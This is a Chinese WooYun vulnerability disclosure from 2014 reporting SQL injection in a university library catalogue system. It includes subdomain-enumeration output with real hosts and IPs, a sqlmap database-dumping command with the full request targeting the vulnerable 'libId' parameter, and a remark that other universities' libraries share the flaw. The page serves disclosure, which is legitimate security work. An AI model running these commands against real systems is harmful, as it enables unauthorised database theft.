当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075742

漏洞标题:贵州财经大学网站存在SQL注入

相关厂商:贵州财经大学

漏洞作者: spiderman

提交时间:2014-09-11 11:29

修复时间:2014-09-16 11:30

公开时间:2014-09-16 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-11: 细节已通知厂商并且等待厂商处理中
2014-09-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

贵州财经大学图书馆子域名存在sql注入,可导致拖库

详细说明:

1. 用fierce查看贵州财经大学网站的子域名:
fierce -dns gzife.edu.cn -thread 5
DNS Servers for gzife.edu.cn:
dns.gzife.edu.cn
Trying zone transfer first...
Testing dns.gzife.edu.cn
Request timed out or transfer not allowed.
Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force
Checking for wildcard DNS...
Nope. Good.
Now performing 2280 test(s)...
58.16.80.230 client.gzife.edu.cn
210.40.80.33 dns.gzife.edu.cn
59.108.227.55 dc.gzife.edu.cn
58.16.80.235 hr.gzife.edu.cn
58.16.80.237 im.gzife.edu.cn
58.16.80.236 i.gzife.edu.cn
58.16.80.193 library.gzife.edu.cn
210.40.80.3 mail.gzife.edu.cn
58.16.80.238 nc.gzife.edu.cn
210.40.80.3 pop.gzife.edu.cn
58.16.80.234 portal.gzife.edu.cn
58.16.80.242 sms.gzife.edu.cn
58.16.80.238 sw.gzife.edu.cn
58.16.80.243 vpn.gzife.edu.cn
58.16.80.234 www.gzife.edu.cn
2. 打开图书馆子域名,看是否存在漏洞。发现可以根据关键词查找书籍

开始查询.png


3.查询后发现跳转到了一个新的域名,这个域名刚才使用firece没有发现:

跳转的域名.png


4.这个域名看来是通过图书馆的搜索功能跳转过来的,嫌疑比较大,然后找啊找,找到了一个sql注入的地方:

发现sql.png


漏洞证明:

使用sqlmap进行拖库,sqlmap -r /root/my.txt -p "libId" --dbs
其中my.txt的内容为:
http://opac.gufe.edu.cn:8080/opac/getBibliographicByLibId?libId=1
GET /opac/getBibliographicByLibId?libId=1 HTTP/1.1
Host: opac.gufe.edu.cn:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://opac.gufe.edu.cn:8080/opac/newbook?tag=newbook&subtag=newbook_list
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Cookie: JSESSIONID=8E2F20AC27EAB2464A4F58ECCB6496CB
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
拖库结果如下:

拖库结果.png


由于是使用sqlmap的time-based方法进行拖库,所以很慢,就ctr+c停止了,能证明拖库即可
后来在google上搜索了下这个url,发现很多其他大学的图书馆系统也有使用这套检索系统,同样存在sql注入漏洞:

inurl.png


other1.png


other2.png


修复方案:

提供检索系统的应该是:北京金盘鹏图软件技术有限公司
让他们修改吧
危害太大了,能秒很多的大学图书馆系统

版权声明:转载请注明来源 spiderman@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-16 11:30

厂商回复:

最新状态:

暂无